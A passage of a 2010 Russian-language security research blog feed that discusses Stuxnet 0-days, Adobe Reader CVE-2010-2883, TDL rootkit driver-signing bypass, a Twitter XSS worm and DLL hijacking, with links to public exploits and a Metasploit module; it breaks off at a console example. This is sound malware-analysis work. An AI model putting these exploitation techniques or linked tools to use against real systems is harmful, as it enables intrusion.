href='http://amatrosov.blogspot.com/2010/10/another-report-about-stuxnet.html' title='Another report about Stuxnet'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-618683815638916337</id><published>2010-09-29T20:43:00.001+04:00</published><updated>2010-09-29T20:43:50.370+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Unpatched 0-day's, Stuxnet and M$</title><content type='html'>Не для какого уже давно не секрет,что как только появилась информация об использовании червем Stuxnet не закрытых уязвимостей, множество исследователей по разные стороны баррикад стали их искать. Кому-то удалось &lt;a href="http://www.immunityinc.com/ceu-index.shtml"&gt;их найти&lt;/a&gt;, а кому-то нет, но не понятно, когда они будут закрыты. Обе уязвимости используются червем для повышения локальных привилегий в системе при своей инсталляции в систему.&lt;br&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_gn-7ejyJv08/TKNqhyWVhVI/AAAAAAAAAtc/zaiOy8DaMvM/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/_gn-7ejyJv08/TKNqhyWVhVI/AAAAAAAAAtc/zaiOy8DaMvM/s400/1.PNG" width="342"&gt;&lt;/a&gt;&lt;/div&gt;&lt;br&gt;&lt;a href="http://amatrosov.blogspot.com/2010/09/unpatched-0-days-stuxnet-and-m.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-618683815638916337?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/618683815638916337/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/09/unpatched-0-days-stuxnet-and-m.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/618683815638916337'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/618683815638916337'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/09/unpatched-0-days-stuxnet-and-m.html' title='Unpatched 0-day&apos;s, Stuxnet and M$'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_gn-7ejyJv08/TKNqhyWVhVI/AAAAAAAAAtc/zaiOy8DaMvM/s72-c/1.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-6100280206607773419</id><published>2010-09-27T20:19:00.000+04:00</published><updated>2011-10-19T15:36:44.416+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='Cyberwar'/><title type='text'>Засветился на НТВ сегодня немножко :)</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Не успел прийти сегодня на работу, как понабежали журналисты и начали допрашивать насчет червя Stuxnet. Говорят наш отчет даже читали :)&lt;br /&gt;&lt;br /&gt;&lt;object height="388" width="480"&gt;&lt;param name="movie" value="http://www1.ntv.ru/swf/vp.swf?link=http://www.ntv.ru/vi206202/&amp;id=206202&amp;num=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;embed src="http://www.ntv.ru/swf/vp.swf?link=http://www.ntv.ru/vi206202/&amp;id=206202&amp;num=1" type="application/x-shockwave-flash" width="480" height="388" allowFullScreen="true"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-6100280206607773419?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/6100280206607773419/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/09/blog-post.html#comment-form' title='Комментарии: 3'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6100280206607773419'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6100280206607773419'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/09/blog-post.html' title='Засветился на НТВ сегодня немножко :)'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-2209630485674601459</id><published>2010-09-24T20:05:00.002+04:00</published><updated>2010-09-24T20:09:06.704+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='codname Aurora'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Stuxnet Under the Microscope</title><content type='html'>Вчера вечером мы закончили подготовку&amp;nbsp;достаточно&amp;nbsp;серьезного &lt;a href="http://www.eset.com/resources/white-papers/Stuxnet_Under_the_Microscope.pdf"&gt;исследования&lt;/a&gt; по анализу червя Win32/Stuxnet. Самым сложным было подготовить сам отчет, т.к. он постоянно разрастался, потому как хотелось описать все, но описать все, таки не получилось. Некоторые подробности внедрения вредоносного функционала в SCADA остались за кадром (ну нету у нас реактора для тестов :)). Также мы не стали публиковать описание еще двух 0-day уязвимостей, которые пока до сих пор не закрыты и MS попросила этого не делать. Одна из них находится в win32k.sys и служит для повышения локальных&amp;nbsp;привилегий в&amp;nbsp;процессе&amp;nbsp;инсталляции на&amp;nbsp;операционные&amp;nbsp;системы Win2000/WinXP. А вторая поинтереснее, т.к. позволяет повысить&amp;nbsp;привилегии на Vista/Win7, через уязвимость в Task Scheduler. Пока про эти уязвимости больше ничего не скажу, всему свое время ;)&lt;br /&gt;&lt;div&gt;Искренне считаю, что мы провели полезное исследование и смогли правильно преподнести его результаты, поэтому крайне рекомендую вам с ним ознакомиться.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-2209630485674601459?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/2209630485674601459/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/09/stuxnet-under-microscope.html#comment-form' title='Комментарии: 4'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2209630485674601459'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2209630485674601459'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/09/stuxnet-under-microscope.html' title='Stuxnet Under the Microscope'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-3549551796746267661</id><published>2010-09-21T18:22:00.001+04:00</published><updated>2010-09-21T18:23:13.471+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Javascript'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Twitpocalypsis NOW!</title><content type='html'>Много радости и веселья сегодня доставил Twitter пользователям веб-интерфейса. Дело в том, что свеженайденная XSS-уязвимость породила кучу различных веселых твитов содержащих JavaScript, который выполнялся при их просмотре :)&lt;br&gt;Например, вот такое вот безобидное на первый взгляд сообщение, может привести к интересным последствиям.&lt;br&gt;&lt;div&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_gn-7ejyJv08/TJi73qMc-2I/AAAAAAAAAs4/usteXelzY5E/s1600/asintsov.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="56" src="http://1.bp.blogspot.com/_gn-7ejyJv08/TJi73qMc-2I/AAAAAAAAAs4/usteXelzY5E/s400/asintsov.PNG" width="400"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2010/09/twitpocalypsis-now.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-3549551796746267661?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/3549551796746267661/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/09/twitpocalypsis-now.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/3549551796746267661'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/3549551796746267661'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/09/twitpocalypsis-now.html' title='Twitpocalypsis NOW!'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gn-7ejyJv08/TJi73qMc-2I/AAAAAAAAAs4/usteXelzY5E/s72-c/asintsov.PNG' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-7427322656529645719</id><published>2010-09-13T16:43:00.004+04:00</published><updated>2010-09-14T15:13:32.174+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PDF'/><category scheme='http://www.blogger.com/atom/ns#' term='ASLR'/><category scheme='http://www.blogger.com/atom/ns#' term='Javascript'/><category scheme='http://www.blogger.com/atom/ns#' term='heap-spray'/><category scheme='http://www.blogger.com/atom/ns#' term='ROP'/><category scheme='http://www.blogger.com/atom/ns#' term='Adobe'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='DEP'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Опять Adobe накосячил (CVE-2010-2883)</title><content type='html'>На прошлой неделе был обнародован очередной 0-day для Adobe Reader (&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2883"&gt;CVE-2010-2883&lt;/a&gt;). На этот раз повинна оказалась CoolType.dll, которая отвечает за парсинг True Type Font. Уязвимость проявляется при обработке шрифта с неправильной &lt;a href="http://en.wikipedia.org/wiki/OpenType#SING_gaiji_solution"&gt;SING таблицей&lt;/a&gt;. В функции обработки есть вызов небезопасной синшной функции &lt;a href="http://msdn.microsoft.com/ru-ru/library/h1x0y282.aspx"&gt;strcat()&lt;/a&gt;, которая при определенных условиях приводит к переполнению на стеке.&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_gn-7ejyJv08/TI4DG3N8-qI/AAAAAAAAAsA/Ra2YD7pU8Zg/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="http://4.bp.blogspot.com/_gn-7ejyJv08/TI4DG3N8-qI/AAAAAAAAAsA/Ra2YD7pU8Zg/s640/4.png" width="259"&gt;&lt;/a&gt;&lt;/div&gt;&lt;br&gt;&lt;a href="http://amatrosov.blogspot.com/2010/09/adobe-cve-2010-2883.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-7427322656529645719?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/7427322656529645719/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/09/adobe-cve-2010-2883.html#comment-form' title='Комментарии: 4'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7427322656529645719'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7427322656529645719'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/09/adobe-cve-2010-2883.html' title='Опять Adobe накосячил (CVE-2010-2883)'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_gn-7ejyJv08/TI4DG3N8-qI/AAAAAAAAAsA/Ra2YD7pU8Zg/s72-c/4.png' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-3163249926576954023</id><published>2010-09-01T17:24:00.003+04:00</published><updated>2010-10-12T15:32:11.450+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><title type='text'>TDL поработил x64</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: left;"&gt;Сегодня написал &lt;a href="http://habrahabr.ru/company/eset/blog/103249/"&gt;обзорную статью&lt;/a&gt; о новом витке развития нашумевшего руткита TDL3, который на долго поселился в головах исследователей из антивирусных компаний. TDL3&amp;nbsp;считается&amp;nbsp;одним из самых передовых творений разработчиков руткитов на сегодняшний день. О нем писали очень много, одни из последних публикаций это &lt;a href="http://amatrosov.blogspot.com/2010/06/win32olmarik-tdl3.html"&gt;отчет о нашем исследовании&lt;/a&gt; этого руткита и статья "&lt;a href="http://www.nobunkum.ru/issue003/tdss-botnet/"&gt;TDSS: полное раскрытие&lt;/a&gt;" от&amp;nbsp;eSage Lab.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Интересную статистику (по распространению всего семейства) по сабжу&amp;nbsp;&lt;a href="http://blogs.technet.com/b/mmpc/archive/2010/08/27/alureon-evolves-to-64-bit.aspx"&gt;показала&lt;/a&gt;&amp;nbsp;MS:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_gn-7ejyJv08/TH5Jkg9Yx0I/AAAAAAAAArs/XyIe6ITQxUk/s1600/al64-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TH5Jkg9Yx0I/AAAAAAAAArs/XyIe6ITQxUk/s320/al64-1.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Как мы видим&amp;nbsp;присутствует явное доминирование платформы WinXP и в новой версии авторы видимо решили исправить такое положение дел. Кол-во&amp;nbsp;инсталляций Win7 x64 постоянно растет и теперь есть механизмы, позволяющие&amp;nbsp;инсталлировать&amp;nbsp;руткиты и на эту платформу.&amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Концепт (&lt;a href="http://fyyre.ivory-tower.de/projects/bootkit_fasm.rar"&gt;Disable PatchGuard &amp;amp; Driver signature enforcement&lt;/a&gt;) механизма обхода проверки подписи в x64 появился еще в начале года в публичном доступе, но авторами помимо предложенного в нем механизма&amp;nbsp;используется&amp;nbsp;еще вызов недокументированной функции&amp;nbsp;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;i&gt;IoCreateDriver()&lt;/i&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px;"&gt;,&lt;/span&gt;&amp;nbsp;которая собственно и позволяет выполнить вредоносный драйвер (про это есть немного &lt;a href="http://www.codeproject.com/KB/security/Bootkit.aspx"&gt;тут&lt;/a&gt;).&amp;nbsp;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-3163249926576954023?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/3163249926576954023/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/09/tdl-x64.html#comment-form' title='Комментарии: 6'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/3163249926576954023'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/3163249926576954023'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/09/tdl-x64.html' title='TDL поработил x64'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_gn-7ejyJv08/TH5Jkg9Yx0I/AAAAAAAAArs/XyIe6ITQxUk/s72-c/al64-1.png' height='72' width='72'/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-6103620143440370432</id><published>2010-08-31T21:11:00.002+04:00</published><updated>2011-08-30T20:12:19.252+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='FUN'/><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><category scheme='http://www.blogger.com/atom/ns#' term='CC'/><title type='text'>Chaos Constructions'2010 (Outro)</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Провел все выходные на фестивале Chaos Constructions'2010, собственно сабж меня особенно не чем не впечатлил. Хотя в этом году совместными усилиями большого количества людей был подготовлен лучший HackQuest за всю историю и был некоторый перевес в сторону ИБ на семинарах. Но, как мне кажется часть касающуюся безопасности пора выделять в отдельное мероприятие и развивать его. Практическими все доклады делались ведущими специалистами из различных областей ИБ, которые понимали о чем говорят. Так как к подготовке HackQuest подошли очень серьезно, народ не прошел больше половины заданий. Но в ближайшее время он будет выложен в общий доступ и каждый желающий сможет попробовать свои силы.&lt;br /&gt;Самой интересной частью был вечер субботы, когда удалось собрать весь интересный народ в одном кабаке и со всеми пообщаться :)   &lt;br /&gt;&lt;br /&gt;&lt;object height="375" width="500"&gt;&lt;param name="bgcolor" value="#000000"/&gt;&lt;param name="movie" value="http://fotki.yandex.ru/swf/slideshow"/&gt;&lt;param name="FlashVars" value="author=matros0ff&amp;amp;effects=1&amp;amp;host_img=http://img-fotki.yandex.ru/&amp;amp;host_xml=fotki.yandex.ru&amp;amp;mode=album&amp;amp;id=99985"/&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="quality" value="high"/&gt;&lt;embed src="http://fotki.yandex.ru/swf/slideshow" flashvars="author=matros0ff&amp;amp;effects=1&amp;amp;host_img=http://img-fotki.yandex.ru/&amp;amp;host_xml=fotki.yandex.ru&amp;amp;mode=album&amp;amp;id=99985" allowfullscreen="true" quality="high" width="500" height="375" bgcolor="#000000" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-6103620143440370432?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/6103620143440370432/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/08/chaos-constructions2010-outro.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6103620143440370432'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6103620143440370432'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/08/chaos-constructions2010-outro.html' title='Chaos Constructions&apos;2010 (Outro)'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8473731252303366143</id><published>2010-08-26T14:11:00.000+04:00</published><updated>2010-08-26T14:11:06.977+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><category scheme='http://www.blogger.com/atom/ns#' term='Hiew'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Python'/><title type='text'>Змеиный костыль PyHiew</title><content type='html'>Неожиданно несколько дней назад один из нынешних разработчиков IDA Pro - Elias Bachaalany, опубликовал интересный плагинчик для Hiew. PyHiew это полноценный&amp;nbsp;&lt;a href="http://www.hiew.ru/hem.html"&gt;HEM&lt;/a&gt;&amp;nbsp;модуль, который позволяет вам автоматизировать различную рутину на python. Плагин&amp;nbsp;распространяется&amp;nbsp;с сырками и лежит &lt;a href="http://code.google.com/p/pyhiew/"&gt;здесь&lt;/a&gt;. Примеры работы с ним можно посмотреть непосредственно в &lt;a href="http://0xeb.wordpress.com/2010/08/21/introducing-pyhiew/"&gt;блоге&lt;/a&gt; у&amp;nbsp;Elias.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;import hiew&lt;br /&gt;hiew.Message(“Hi”, “Hello world!”)&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://0xeb.files.wordpress.com/2010/08/hello_world.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="50" src="http://0xeb.files.wordpress.com/2010/08/hello_world.gif" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8473731252303366143?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8473731252303366143/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/08/pyhiew.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8473731252303366143'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8473731252303366143'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/08/pyhiew.html' title='Змеиный костыль PyHiew'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-1575755025118757817</id><published>2010-08-24T20:03:00.001+04:00</published><updated>2010-08-24T20:29:52.628+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ASLR'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='DEP'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>0-day by design (Security Advisory (2269637))</title><content type='html'>На прошлой неделе появилась информация о найденной новой концептуальной уязвимости позволяющий выполнить произвольную&amp;nbsp;динамическую&amp;nbsp;библиотеку, путем подмены ее легального экземпляра. Эта информация появилась от автора Metasploit &lt;a href="https://twitter.com/HDMOORE"&gt;HDmoore&lt;/a&gt;&amp;nbsp;и он сразу приводил &lt;a href="http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt"&gt;пример работы&lt;/a&gt;&amp;nbsp;этой&amp;nbsp;уязвимости с iTunes. Народ задергался и понял, что пахнет архитектурной брешью, правда все и так о ней знали уже хрен знает сколько времени и чего задергались все только&amp;nbsp;сейчас&amp;nbsp;непонятно (причем даже MS &lt;a href="http://blogs.msdn.com/b/david_leblanc/archive/2008/02/20/dll-preloading-attacks.aspx"&gt;знал&lt;/a&gt; уже не один год об этом). Я в нашем &lt;a href="http://habrahabr.ru/company/eset/blog/102549/"&gt;посте&lt;/a&gt; на хабре достаточно подробно описал саму уязвимость и возможные пути решения проблемы, но некоторые мысли еще остались и для собственного бложика :)&lt;br /&gt;В последнее время мы наблюдаем уже второй 0-day (первый, &lt;a href="http://amatrosov.blogspot.com/2010/07/ms-cve-2010-2568-lnkpokalipsis.html"&gt;история с Lnk&lt;/a&gt;) с найденной архитектурной ошибкой,&amp;nbsp;by design так сказать. По своей структуре обе эти&amp;nbsp;уязвимости&amp;nbsp;довольно похожи. Такого рода уязвимости&amp;nbsp;закрываются значительно&amp;nbsp;дольше, да и время жизни эксплуатации таких&amp;nbsp;уязвимостей не&amp;nbsp;сравнимо.&amp;nbsp;Не говоря&amp;nbsp;уже о том, что&amp;nbsp;не нужно&amp;nbsp;заморачиваться со всякими DEP и ASLR. А в данном конкретном случае&amp;nbsp;уязвимыми&amp;nbsp;являются&amp;nbsp;достаточно большое количество приложений. Но вот действительно удивляет то, что MS сама не использует свои&amp;nbsp;&amp;nbsp;&lt;a href="http://msdn.microsoft.com/en-us/library/ff919712(VS.85).aspx"&gt;best practices&lt;/a&gt; при разработке. Уже появился PoC для &lt;a href="http://www.securityfocus.com/bid/1699/exploit"&gt;Word &lt;/a&gt;и &lt;a href="http://www.exploit-db.com/exploits/14723/"&gt;PowerPoint&lt;/a&gt;. Ну, а &lt;a href="http://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/webdav_dll_hijacker.rb"&gt;generic exploit&lt;/a&gt; в составе Metasploit вообще шикарен. Пример эксплуатации:&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: monospace; font-size: 14px; line-height: 18px; white-space: pre;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;msf &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: monospace; font-size: 14px; line-height: 18px; white-space: pre;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;use 